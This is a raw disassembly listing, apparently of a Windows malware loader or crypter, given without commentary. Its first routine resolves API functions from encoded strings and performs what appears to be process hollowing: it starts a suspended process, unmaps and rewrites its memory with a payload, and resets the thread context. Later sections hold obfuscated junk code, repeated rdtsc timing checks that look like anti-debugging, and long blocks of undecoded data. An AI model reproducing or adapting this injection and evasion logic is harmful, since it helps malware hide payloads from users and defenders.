call [ebp+var_40]
mov [ebp+var_44], eax
lea edx, [ebp+var_1A0]
mov eax, offset aNaQlnkuaooiaik ; " œŸ‹ª ®®ˆ ¨ª´"
call sub_401F5C
mov eax, [ebp+var_1A0]
call sub_40198C
push eax
mov eax, [ebp+hModule]
push eax
call [ebp+var_40]
mov [ebp+var_48], eax
lea edx, [ebp+var_1A4]
mov eax, offset aTndpalnkuaooia ; "’¤¯ ‹ª ®®ˆ ¨ª´"
call sub_401F5C
mov eax, [ebp+var_1A4]
call sub_40198C
push eax
mov eax, [ebp+hModule]
push eax
call [ebp+var_40]
mov [ebp+var_4C], eax
lea edx, [ebp+var_1A8]
mov eax, offset aOappgnaQKipaP ; " ¯£ œŸ~ª©¯ ³¯"
call sub_401F5C
mov eax, [ebp+var_1A8]
call sub_40198C
push eax
mov eax, [ebp+hModule]
push eax
call [ebp+var_40]
mov [ebp+var_50], eax
lea edx, [ebp+var_1AC]
mov eax, offset dword_40258C
call sub_401F5C
mov eax, [ebp+var_1AC]
call sub_40198C
push eax
mov eax, [ebp+hModule]
push eax
call [ebp+var_40]
mov [ebp+var_54], eax
lea edx, [ebp+var_1B0]
mov eax, offset dword_4025A4
call sub_401F5C
mov eax, [ebp+var_1B0]
call sub_40198C
push eax
mov eax, [ebp+hModule]
push eax
call [ebp+var_40]
mov [ebp+var_58], eax
lea edx, [ebp+var_1B4]
mov eax, offset aSdnpZlnkpaupa ; "‘¤¯°œ§‹ª¯ ¯€³"
call sub_401F5C
mov eax, [ebp+var_1B4]
call sub_40198C
push eax
mov eax, [ebp+hModule]
push eax
call [ebp+var_40]
mov [ebp+var_5C], eax
lea edx, [ebp+var_1B8]
mov eax, offset aXRiiLsdaKboaup ; "•²©¨œ«‘¤ ²Š¡ ¯¤ª©"
call sub_401F5C
mov eax, [ebp+var_1B8]
call sub_40198C
push eax
mov eax, [ebp+var_18]
push eax
call [ebp+var_40]
mov [ebp+var_60], eax
lea edx, [ebp+var_1BC]
mov eax, offset aPanidiPalnkuao ; " ¨¤©œ¯ ‹ª ®®"
call sub_401F5C
mov eax, [ebp+var_1BC]
call sub_40198C
push eax
mov eax, [ebp+hModule]
push eax
call [ebp+var_40]
mov [ebp+var_64], eax
mov [ebp+var_D], 0
lea eax, [ebp+var_78]
xor ecx, ecx
mov edx, 10h
call sub_4013DC
lea eax, [ebp+var_BC]
xor ecx, ecx
mov edx, 44h
call sub_4013DC
mov [ebp+var_BC], 44h
xor eax, eax
mov al, [ebp+arg_0]
mov [ebp+var_8C], ax
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_BC]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
mov eax, [ebp+var_C]
call sub_40198C
push eax
mov eax, [ebp+var_8]
call sub_40198C
push eax
call [ebp+var_3C]
test eax, eax
jz loc_402479
mov [ebp+var_35], 1
xor eax, eax
push ebp
push offset loc_402472
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_188], 10002h
lea eax, [ebp+var_188]
push eax
mov eax, [ebp+var_74]
push eax
call [ebp+var_44]
test eax, eax
jz loc_402446
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_E4]
add eax, 8
push eax
mov eax, [ebp+var_78]
push eax
call [ebp+var_48]
test eax, eax
jz loc_402446
mov eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_78]
push eax
call [ebp+var_60]
test eax, eax
jl loc_402446
cmp [ebp+var_4], 0
jz loc_402446
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
add eax, [ebp+var_4]
mov [ebp+var_30], eax
push 4
push 3000h
mov eax, [ebp+var_30]
mov eax, [eax+50h]
push eax
mov eax, [ebp+var_30]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_78]
push eax
call [ebp+var_58]
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_402446
lea eax, [ebp+var_24]
push eax
mov eax, [ebp+var_30]
mov eax, [eax+54h]
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_78]
push eax
call [ebp+var_4C]
test eax, eax
jz loc_402446
mov eax, [ebp+var_30]
call sub_401F18
mov [ebp+var_34], eax
mov eax, [ebp+var_30]
movzx eax, word ptr [eax+6]
dec eax
test eax, eax
jb loc_402401
inc eax
mov [ebp+var_68], eax
mov [ebp+var_28], 0
loc_402379: ; CODE XREF: sub_401FF4+407�j
lea eax, [ebp+var_24]
push eax
mov eax, [ebp+var_28]
lea eax, [eax+eax*4]
mov edx, [ebp+var_34]
mov eax, [edx+eax*8+10h]
push eax
mov eax, [ebp+var_28]
lea eax, [eax+eax*4]
mov edx, [ebp+var_34]
mov eax, [edx+eax*8+14h]
add eax, [ebp+var_4]
push eax
mov eax, [ebp+var_28]
lea eax, [eax+eax*4]
mov edx, [ebp+var_34]
mov eax, [edx+eax*8+0Ch]
add eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_78]
push eax
call [ebp+var_4C]
test eax, eax
jz short loc_4023F5
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+var_28]
lea eax, [eax+eax*4]
mov edx, [ebp+var_34]
mov eax, [edx+eax*8+24h]
call sub_401F3C
push eax
mov eax, [ebp+var_28]
lea eax, [eax+eax*4]
mov edx, [ebp+var_34]
mov eax, [edx+eax*8+8]
push eax
mov eax, [ebp+var_28]
lea eax, [eax+eax*4]
mov edx, [ebp+var_34]
mov eax, [edx+eax*8+0Ch]
add eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_78]
push eax
call [ebp+var_5C]
loc_4023F5: ; CODE XREF: sub_401FF4+3C2�j
inc [ebp+var_28]
dec [ebp+var_68]
jnz loc_402379
loc_402401: ; CODE XREF: sub_401FF4+374�j
lea eax, [ebp+var_24]
push eax
push 4
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_E4]
add eax, 8
push eax
mov eax, [ebp+var_78]
push eax
call [ebp+var_4C]
test eax, eax
jz short loc_402446
mov eax, [ebp+var_30]
mov eax, [eax+28h]
add eax, [ebp+var_1C]
mov [ebp+var_D8], eax
lea eax, [ebp+var_188]
push eax
mov eax, [ebp+var_74]
push eax
call [ebp+var_50]
cmp eax, 1
sbb eax, eax
inc eax
mov [ebp+var_35], al
loc_402446: ; CODE XREF: sub_401FF4+2C2�j
; sub_401FF4+2E5�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402479
loc_402453: ; CODE XREF: sub_401FF4+483�j
cmp [ebp+var_35], 0
jnz short loc_402464
push 0
mov eax, [ebp+var_78]
push eax
call [ebp+var_64]
jmp short loc_40246B
; ---------------------------------------------------------------------------
loc_402464: ; CODE XREF: sub_401FF4+463�j
mov eax, [ebp+var_74]
push eax
call [ebp+var_54]
loc_40246B: ; CODE XREF: sub_401FF4+46E�j
mov al, [ebp+var_35]
mov [ebp+var_D], al
retn
; ---------------------------------------------------------------------------
loc_402472: ; DATA XREF: sub_401FF4+29D�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_402453
; ---------------------------------------------------------------------------
loc_402479: ; CODE XREF: sub_401FF4+290�j
; DATA XREF: sub_401FF4+45A�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4024AB
loc_402486: ; CODE XREF: sub_401FF4+4B5�j
lea eax, [ebp+var_1BC]
mov edx, 0Dh
call sub_401704
lea eax, [ebp+var_C]
mov edx, 2
call sub_401704
retn
; ---------------------------------------------------------------------------
loc_4024A4: ; DATA XREF: sub_401FF4+30�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_402486
; ---------------------------------------------------------------------------
loc_4024AB: ; CODE XREF: sub_401FF4+4AF�j
; DATA XREF: sub_401FF4+48D�o
mov al, [ebp+var_D]
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_401FF4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 0Ch
dword_4024C0 dd 0A9ADA0A6h, 6D6EA7A0h, 0A7A79F69h, 0 ; DATA XREF: sub_401FF4+41�o
dd 0FFFFFFFFh, 9
dword_4024D8 dd 0A79FAFA9h, 0A79F69A7h, 0A7h, 0FFFFFFFFh, 0Eh ; DATA XREF: sub_401FF4+65�o
dword_4024EC dd 8BAFA082h, 7C9EAAADh, 0A0AD9F9Fh, 0AEAEh, 0FFFFFFFFh
; DATA XREF: sub_401FF4+89�o
dd 0Eh
dword_402504 dd 9CA0AD7Eh, 0AD8BA0AFh, 0AEA09EAAh, 7CAEh, 0FFFFFFFFh
; DATA XREF: sub_401FF4+B1�o
dd 10h
aVappgnaQKipaP db '‚ ¯£ œŸ~ª©¯ ³¯',0 ; DATA XREF: sub_401FF4+D7�o
align 10h
dd 0FFFFFFFFh, 11h
aNaQlnkuaooiaik db ' œŸ‹ª ®®ˆ ¨ª´',0 ; DATA XREF: sub_401FF4+FD�o
align 4
dd 0FFFFFFFFh, 12h
aTndpalnkuaooia db '’¤¯ ‹ª ®®ˆ ¨ª´',0 ; DATA XREF: sub_401FF4+123�o
align 4
dd 0FFFFFFFFh, 10h
aOappgnaQKipaP db ' ¯£ œŸ~ª©¯ ³¯',0 ; DATA XREF: sub_401FF4+149�o
align 4
dd 0FFFFFFFFh, 0Ch
dword_40258C dd 0B0AEA08Dh, 0A38FA0A8h, 9F9CA0ADh, 0 ; DATA XREF: sub_401FF4+16F�o
dd 0FFFFFFFFh, 0Eh
dword_4025A4 dd 0AFADA491h, 7CA79CB0h, 9EAAA7A7h, 0B380h, 0FFFFFFFFh
; DATA XREF: sub_401FF4+195�o
dd 10h
aSdnpZlnkpaupa db '‘¤¯°œ§‹ª¯ ¯€³',0 ; DATA XREF: sub_401FF4+1BB�o
align 10h
dd 0FFFFFFFFh, 14h
aXRiiLsdaKboaup db '•²©¨œ«‘¤ ²Š¡ ¯¤ª©',0 ; DATA XREF: sub_401FF4+1E1�o
align 10h
dd 0FFFFFFFFh, 10h
aPanidiPalnkuao db ' ¨¤©œ¯ ‹ª ®®',0 ; DATA XREF: sub_401FF4+207�o
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402631
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_40612C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402638
loc_402630: ; CODE XREF: CODE:00402636�j
retn
; ---------------------------------------------------------------------------
loc_402631: ; DATA XREF: CODE:00402612�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_402630
; ---------------------------------------------------------------------------
loc_402638: ; CODE XREF: CODE:loc_402630�j
; DATA XREF: CODE:0040262B�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_40612C, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402644 proc near ; CODE XREF: start+27�p sub_403EB5+E�p ...
push ebp
mov ebp, esp
push ecx
push 2 ; dwMilliseconds
call Sleep
push 2 ; dwMilliseconds
call Sleep
push 2 ; dwMilliseconds
call Sleep
push 2 ; dwMilliseconds
call Sleep
push 2 ; dwMilliseconds
call Sleep
jmp loc_402822
sub_402644 endp
; ---------------------------------------------------------------------------
dd 3CF97848h, 84FA0078h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40279E
loc_402678: ; CODE XREF: sub_40279E+9D�j
; sub_40279E+A3�j
xadd eax, eax
push 1
pop eax
jmp short loc_402681
; END OF FUNCTION CHUNK FOR sub_40279E
; ---------------------------------------------------------------------------
db 0EAh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40279E
loc_402681: ; CODE XREF: sub_40279E-120�j
imul eax, eax
inc eax
jz near ptr loc_4026C9+1
jnz near ptr loc_4026C9+1
mov large ds:1E8h, eax ; CODE XREF: sub_40279E+29�j
; sub_40279E+2F�j
add [esi+1E8h], dh
add [eax-7Dh], bh
inc esp
and al, 4
adc al, [ebx-3CF5DBFCh]
inc eax
call near ptr loc_4026B8+1
jb short loc_402715
imul esi, [bp+di+74h], 64657265h
loc_4026B8: ; CODE XREF: sub_40279E-F5�p
add [eax+6Ah], bl
pop ebx
pop eax
jp loc_40280A
jnp loc_40280A
loc_4026C9: ; CODE XREF: sub_40279E-119�j
; sub_40279E-113�j
cmp ebp, ebx
or esi, [edx+65h]
imul esi, [bp+di+74h], 64657265h
add [edi], cl
mov cl, [edi+0F000000h]
mov ecx, [ecx+50000000h]
loc_4026E4: ; CODE XREF: sub_40279E+78�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 5000h
loc_4026F4: ; CODE XREF: sub_40279E:loc_4026F4�j
jg short loc_4026F4
push 84D5h
add esp, 4
rol ebx, 5
ror ebx, 5
inc ecx
jmp loc_402882
; END OF FUNCTION CHUNK FOR sub_40279E
; ---------------------------------------------------------------------------
dw 0B07Ch
dd 6A243CF9h
; ---------------------------------------------------------------------------
test al, 0F2h
; START OF FUNCTION CHUNK FOR sub_40279E
loc_402712: ; CODE XREF: sub_40279E:loc_402891�j
; sub_40279E+F9�j
rdtsc
; END OF FUNCTION CHUNK FOR sub_40279E
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_402715: ; CODE XREF: sub_40279E-F0�j
enter 310Fh, 2Bh
enter 0FFFFD1F7h, 81h
stc
add [eax+0], dl
add [ebp+eax-17h], bh
fstp tbyte ptr [esp+ebp]
dec esp
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 5000h
loc_402739: ; CODE XREF: CODE:loc_402739�j
jg short loc_402739
jmp short loc_40273F
; ---------------------------------------------------------------------------
db 37h, 0ECh
; ---------------------------------------------------------------------------
loc_40273F: ; CODE XREF: CODE:0040273B�j
mov eax, eax
jz loc_4027D4
jnz loc_4027D4
call small near ptr 275Ch ; CODE XREF: sub_40279E+123�j
; sub_40279E+129�j
; ---------------------------------------------------------------------------
db 2 dup(0), 72h
aEgistered db 'egistered',0
dw 0F58h
dd 1698Ch, 638D0F00h, 98000001h, 1E8h, 1E8F200h, 0A8000000h
dd 4244483h, 24048312h, 0EBF0C30Ah, 6765720Bh, 65747369h
dd 646572h, 7840FF8h, 0F000001h, 10185h
db 0, 17h
; =============== S U B R O U T I N E =======================================
sub_40279E proc near ; CODE XREF: sub_40279E+5F�p
; FUNCTION CHUNK AT 00402678 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00402681 SIZE 00000089 BYTES
; FUNCTION CHUNK AT 00402712 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00402882 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00402891 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004028BF SIZE 0000001E BYTES
xadd eax, eax
setalc
add esp, 4
jl loc_402848
jge loc_402848
adc cl, [edi]
xor [ebx+2B310FC8h], ecx
enter 0FFFFD1F7h, 81h
stc
add [eax+0], dl
add [edi-2], bh
xadd eax, eax
jz near ptr loc_402691+1
jnz near ptr loc_402691+1
dec ecx
loc_4027D4: ; CODE XREF: CODE:00402741�j
; CODE:00402747�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 5000h
loc_4027E4: ; CODE XREF: sub_40279E:loc_4027E4�j
jg short loc_4027E4
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 5000h
loc_4027F6: ; CODE XREF: sub_40279E:loc_4027F6�j
jg short loc_4027F6
jmp short loc_4027FB
; ---------------------------------------------------------------------------
db 24h
; ---------------------------------------------------------------------------
loc_4027FB: ; CODE XREF: sub_40279E+5A�j
mov eax, eax
call sub_40279E
mov eax, ds:0B73CF9BFh
retn
; ---------------------------------------------------------------------------
db 53h, 44h
; ---------------------------------------------------------------------------
loc_40280A: ; CODE XREF: sub_40279E-E1�j
; sub_40279E-DB�j
rol ebx, 5
ror ebx, 5
imul eax, eax
not eax
stc
jb loc_4026E4
add dl, cl
cmpsb
add al, 9
; ---------------------------------------------------------------------------
db 0E5h
; ---------------------------------------------------------------------------
loc_402822: ; CODE XREF: sub_402644+27�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 5000h
loc_402832: ; CODE XREF: sub_40279E:loc_402832�j
jg short loc_402832
rol ebx, 5
ror ebx, 5
stc
jp loc_402678
jnp loc_402678
das
loc_402848: ; CODE XREF: sub_40279E+7�j
; sub_40279E+D�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 5000h
loc_402858: ; CODE XREF: sub_40279E:loc_402858�j
jg short loc_402858
call near ptr loc_402869+1
jb short near ptr loc_4028C1+5
imul esi, [bp+di+74h], 64657265h
loc_402869: ; CODE XREF: sub_40279E+BC�p
add [eax-15h], bl
sub_40279E endp ; sp-analysis failed
add [esi+0FCF0F65h], edx
iret
; ---------------------------------------------------------------------------
db 0F7h
dd 91800FD0h, 0F000000h, 8B81h
db 0, 0D0h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40279E
loc_402882: ; CODE XREF: sub_40279E-99�j
jmp short loc_402891
; END OF FUNCTION CHUNK FOR sub_40279E
; ---------------------------------------------------------------------------
dd 6E6F7277h, 65732067h, 6C616972h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40279E
loc_402891: ; CODE XREF: sub_40279E:loc_402882�j
jo loc_402712
jno loc_402712
in eax, dx
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 5000h
loc_4028AE: ; CODE XREF: sub_40279E:loc_4028AE�j
jg short loc_4028AE
jmp short loc_4028BF
; END OF FUNCTION CHUNK FOR sub_40279E
; ---------------------------------------------------------------------------
dw 7277h
dd 20676E6Fh, 69726573h
db 61h, 6Ch, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40279E
loc_4028BF: ; CODE XREF: sub_40279E+112�j
mov al, al
loc_4028C1: ; CODE XREF: sub_40279E+C1�j
jz near ptr loc_40274D+1
jnz near ptr loc_40274D+1
arpl bx, bp
or esi, [edx+65h]
imul esi, [bp+di+74h], 64657265h
add [edi], cl
iret
; END OF FUNCTION CHUNK FOR sub_40279E
; ---------------------------------------------------------------------------
db 0Fh, 0CFh, 0F3h
dd 0C88B310Fh, 0C82B310Fh, 0F981D1F7h, 5000h, 5250FE7Fh
dd 0C833310Fh, 58C8335Ah, 0F41C08Ah, 0FFFEAD80h, 0A7810FFFh
dd 34FFFFFEh, 8E9h, 0FD2600h, 555FEA3Dh, 5C3C15Dh, 5205CBC1h
dd 0B1800F5Ah, 0F000001h, 1AB81h, 310F7600h, 310FC88Bh
dd 0D1F7C82Bh, 5000F981h, 0FE7F0000h, 4C6F68h, 4C48300h
dd 8C0FC80Fh, 1CAh, 1C48D0Fh, 0FD90000h, 0FC88B31h, 0F7C82B31h
dd 0F981D1h, 7F000050h, 0BE8FEh, 65720000h, 74736967h
dd 64657265h, 0BEB5800h, 69676572h, 72657473h, 0F9006465h
dd 0EE820Fh, 0E2000000h, 8AB0ECCEh, 310F5250h, 335AC833h
dd 0C08A58C8h, 1FD8C0Fh, 8D0F0000h, 1F7h, 8B310F9Ah, 2B310FC8h
dd 81D1F7C8h, 5000F9h, 50FE7F00h, 33310F52h, 0C8335AC8h
dd 8A5A5258h, 66E9C0h, 2ADA0000h, 38163D01h, 1E88F06h
dd 96000000h, 1E8h, 4483F800h, 83120424h, 0C30A2404h, 0CC8F6858h
dd 0C4830000h, 0BA02EB04h, 0BEB4148h, 69676572h, 72657473h
dd 50006465h, 880FF358h, 0FFFFFF1Ah, 0FF14890Fh, 50C3FFFFh
dd 33310F52h, 0C8335AC8h, 0DD04EB58h, 0F8A86824h, 0FF62830Fh
dd 0F800FFFFh, 0E4E41648h, 0C88B310Fh, 0C82B310Fh, 0F981D1F7h
dd 5000h, 310FFE7Fh, 310FC88Bh, 0D1F7C82Bh, 5000F981h
dd 0FE7F0000h, 0F78A0Fh, 8B0F0000h, 0F1h, 9802EB5Eh, 0F5A52E0h
dd 0FFFFA68Ah, 0A08B0FFFh, 53FFFFFFh, 0C88B310Fh, 0C82B310Fh
dd 0F981D1F7h, 5000h, 8F68FE7Fh, 830000CCh, 12E904C4h
dd 4BFFFFFFh, 7D3D0125h, 0FAB8D38h, 0FC88B31h, 0F7C82B31h
dd 0F981D1h, 7F000050h, 8B310FFEh, 2B310FC8h, 81D1F7C8h
dd 5000F9h, 0EBFE7F00h, 0F416801h, 0FFFE868Ah, 808B0FFFh
dd 2BFFFFFEh, 0FC0AF0Fh, 0AF0FC0AFh, 0FF9D6C0h, 0FFFEF182h
dd 0E52300FFh, 0E832B391h, 1, 1E8CAh, 83880000h, 12042444h
dd 0A240483h, 1EB88C3h, 0C4834020h, 62E904h, 47D30000h
dd 14B53D01h, 310F09FCh, 310FC88Bh, 0D1F7C82Bh, 5000F981h
dd 0FE7F0000h, 0BE8h, 67657200h, 65747369h, 646572h, 770DEB58h
dd 676E6F72h, 72657320h, 6C6169h, 0FF518A0Fh, 8B0FFFFFh
dd 0FFFFFF4Bh, 720BEB58h, 73696765h, 65726574h, 0E8400064h
dd 0FFFFFF83h, 3D013CEDh, 744A088Bh, 1E8h, 1E80600h, 0B8000000h
dd 4244483h, 24048312h, 5048C30Ah, 33310F52h, 0C8335AC8h
dd 8A0F6558h, 0FFFFFECDh, 0FEC78B0Fh, 0E9F1FFFFh, 8, 3D00FD26h
dd 5D555FEAh, 0C105C3C1h, 5A5205CBh, 1B1800Fh, 810F0000h
dd 1ABh, 8B310F76h, 2B310FC8h, 81D1F7C8h, 5000F9h, 68FE7F00h
dd 4C6Fh, 0F04C483h, 0CA8C0FC8h, 0F000001h, 1C48Dh, 310FD900h
dd 310FC88Bh, 0D1F7C82Bh, 5000F981h, 0FE7F0000h, 0BE8h
dd 67657200h, 65747369h, 646572h, 720BEB58h, 73696765h
dd 65726574h, 0FF90064h, 0EE82h, 0CEE20000h, 508AB0ECh
dd 33310F52h, 0C8335AC8h, 0FC08A58h, 1FD8Ch, 0F78D0F00h
dd 9A000001h, 0C88B310Fh, 0C82B310Fh, 0F981D1F7h, 5000h
dd 5250FE7Fh, 0C833310Fh, 58C8335Ah, 0C08A5A52h, 66E9h
dd 12ADA00h, 638163Dh, 1E88Fh, 0E8960000h, 1, 244483F8h
dd 4831204h, 58C30A24h, 0CC8F68h, 4C48300h, 48BA02EBh
dd 720BEB41h, 73696765h, 65726574h, 58500064h, 1A880FF3h
dd 0FFFFFFFh, 0FFFF1489h, 5250C3FFh, 0C833310Fh, 58C8335Ah
dd 24DD04EBh, 0FF8A868h, 0FFFF6283h, 48F800FFh, 0FE4E416h
dd 0FC88B31h, 0F7C82B31h, 0F981D1h, 7F000050h, 8B310FFEh
dd 2B310FC8h, 81D1F7C8h, 5000F9h, 0FFE7F00h, 0F78Ah, 0F18B0F00h
dd 5E000000h, 0E09802EBh, 8A0F5A52h, 0FFFFFFA6h, 0FFA08B0Fh
dd 0F53FFFFh, 0FC88B31h, 0F7C82B31h, 0F981D1h, 7F000050h
dd 0CC8F68FEh, 0C4830000h, 0FF12E904h, 254BFFFFh, 387D3D01h
dd 310FAB8Dh, 310FC88Bh, 0D1F7C82Bh, 5000F981h, 0FE7F0000h
dd 0C88B310Fh, 0C82B310Fh, 0F981D1F7h, 5000h, 1EBFE7Fh
dd 8A0F4168h, 0FFFFFE86h, 0FE808B0Fh, 0F2BFFFFh, 0AF0FC0AFh
dd 0C0AF0FC0h, 820FF9D6h, 0FFFFFEF1h, 91E52300h, 1E832B3h
dd 0CA000000h, 1E8h, 44838800h, 83120424h, 0C30A2404h
dd 2001EB88h, 4C48340h, 62E9h, 147D300h, 0FC14B53Dh, 8B310F09h
dd 2B310FC8h, 81D1F7C8h, 5000F9h, 0E8FE7F00h, 0Bh, 69676572h
dd 72657473h, 58006465h, 72770DEBh, 20676E6Fh, 69726573h
dd 0F006C61h, 0FFFF518Ah, 4B8B0FFFh, 58FFFFFFh, 65720BEBh
dd 74736967h, 64657265h, 83E84000h, 0EDFFFFFFh, 8B3D013Ch
dd 0E8744A08h, 1, 1E806h, 83B80000h, 12042444h, 0A240483h
dd 525048C3h, 0C833310Fh, 58C8335Ah, 0CD8A0F65h, 0FFFFFFEh
dd 0FFFEC78Bh, 0E5E9F1FFh, 20000000h, 0E03D0877h, 0EBA1C0FBh
dd 6765720Bh, 65747369h, 646572h, 0F9C0AF0Fh, 14A820Fh
dd 56000000h, 3145223Ah, 0BE8h, 67657200h, 65747369h, 646572h
dd 720BEB58h, 73696765h, 65726574h, 800F0064h, 1A5h, 19F810Fh
dd 0F910000h, 0FC88B31h, 0F7C82B31h, 0F981D1h, 7C000050h
dd 8C3FE905h, 310F6010h, 310FC88Bh, 0D1F7C82Bh, 5000F981h
dd 57C0000h, 0A84CEFE9h, 0A602EB48h, 808C0F38h, 0FFFFFFFh
dd 0FFFF7A8Dh, 0BEB4BFFh, 69676572h, 72657473h, 0F006465h
dd 0B0C08BC8h, 800F41C0h, 1B3h, 1AD810Fh, 0E8800000h, 1
dd 1E852h, 83280000h, 12042444h, 0A240483h, 0BE800C3h
dd 72000000h, 73696765h, 65726574h, 0F580064h, 13D8Ch
dd 378D0F00h, 0B000001h, 0F9C0C10Fh, 0FFA08C0Fh, 8D0FFFFFh
dd 0FFFFFF9Ah, 8B310FF9h, 2B310FC8h, 81D1F7C8h, 5000F9h
dd 0E9057C00h, 0DCCCCC8Fh, 7800F40h, 0F000000h, 181h, 0BE83E00h
dd 72000000h, 73696765h, 65726574h, 0EB580064h, 6765720Bh
dd 65747369h, 646572h, 65720BEBh, 74736967h, 64657265h
dd 880F4100h, 82h, 7C890Fh, 0EBDB0000h, 0A30FC201h, 0FD0F7C0h
dd 308Ah, 2A8B0F00h, 0DA000000h, 0C88B310Fh, 0C82B310Fh
dd 0F981D1F7h, 5000h, 7FE9057Ch, 0F70288Ch, 0C08AC0C1h
dd 99820FF9h, 0FFFFFEh, 58D4F6FAh, 1E830h, 0E8A20000h
dd 1, 24448368h, 4831204h, 58C30A24h, 1E8h, 1E88600h, 0B8000000h
dd 4244483h, 24048312h, 5240C30Ah, 2E8C0F5Ah, 0FFFFFFFh
dd 0FFFF288Dh, 0BEBDEFFh, 69676572h, 72657473h, 0EB006465h
dd 650CDF02h, 0FE698C0Fh, 8D0FFFFFh, 0FFFFFE63h, 1E80Bh
dd 0E8120000h, 1, 24448328h, 4831204h, 0D0C30A24h, 942968h
dd 4C48300h, 0FE9DE936h, 0C35DFFFFh, 789B3D08h, 0BE8AE30h
dd 72000000h, 73696765h, 65726574h, 0EB580064h, 50588E04h
dd 1E860h, 0E8CA0000h, 1, 24448388h, 4831204h, 70C30A24h
dd 0FC0AF0Fh, 880FC0AFh, 61h, 5B890Fh, 0F340000h, 0FC88B31h
dd 0F7C82B31h, 0F981D1h, 7F000050h, 0AA01EBFEh, 7880FF2h
dd 0F000000h, 189h, 0DEB7000h, 6E6F7277h, 65732067h, 6C616972h
dd 0E8C08A00h, 0Bh, 69676572h, 72657473h, 58006465h
dd 0FC0A30Fh, 5850C0A3h, 0FFFEA6E9h, 89499FFh, 4903FF3Dh
dd 30E98Dh, 5ABC0000h, 45E43D0Ch, 310F3B31h, 310FC88Bh
dd 0D1F7C82Bh, 5000F981h, 0FE7F0000h, 0F2501EBh, 0C483C0A3h
dd 820FF904h, 0E8h, 0E9570100h, 0DEB5C77h, 6E6F7277h, 65732067h
dd 6C616972h, 0C0A30F00h, 0FCF0FF9h, 8B310FCFh, 2B310FC8h
dd 81D1F7C8h, 5000F9h, 0E9057C00h, 0E844DC63h, 4B8A0F36h
dd 0F000000h, 458Bh, 8B680600h, 830000FCh, 0AF0F04C4h
dd 0D8A0FC0h, 0F000002h, 2078Bh, 310F1300h, 310FC88Bh
dd 0D1F7C82Bh, 5000F981h, 57C0000h, 448C7FE9h, 0C0A30F6Ch
dd 0C483C08Ah, 478A0F04h, 0F000000h, 418Bh, 310F7700h
dd 310FC88Bh, 0D1F7C82Bh, 5000F981h, 57C0000h, 846C97E9h
dd 8B310F5Ch, 2B310FC8h, 81D1F7C8h, 5000F9h, 50FE7F00h
dd 33310F52h, 0C8335AC8h, 0E2E958h, 66880000h, 0F8383D0Ch
dd 0DEB9B29h, 6E6F7277h, 65732067h, 6C616972h, 0AF04EB00h
dd 0E8BCBC4Ch, 0FFFFFEFEh, 3D0CAF03h, 598EE605h, 1E8h
dd 1E8D200h, 28000000h, 4244483h, 24048312h, 6888C30Ah
dd 0ECB7h, 0F04C483h, 0FC08BC8h, 0FFFF318Ch, 2B8D0FFFh
dd 0DFFFFFFFh, 888A02EBh, 78A0FD6h, 0F000000h, 18Bh, 310FD000h
dd 310FC88Bh, 0D1F7C82Bh, 5000F981h, 0FE7F0000h, 0BCFB04EBh
dd 0FF334F4h, 0BF80h, 0B9810F00h, 1A000000h, 1E8h, 1E8F200h
dd 0A8000000h, 4244483h, 24048312h, 6870C30Ah, 4C6Fh, 0EB04C483h
dd 1EBE001h, 0EB5951C6h, 0F7588E02h, 830FF8D0h, 6, 151E1200h
dd 0A168BB68h, 830000F4h, 0E86504C4h, 0FFFFFEC2h, 3D0CA91Ch
dd 28B16884h, 0BE8h, 67657200h, 65747369h, 646572h, 0C5F6858h
dd 0C4830000h, 51D0F704h, 820FF959h, 0FFFFFF54h, 504AC600h
dd 310F1BFEh, 310FC88Bh, 0D1F7C82Bh, 5000F981h, 0FE7F0000h
dd 0BE8h, 67657200h, 65747369h, 646572h, 720BEB58h, 73696765h
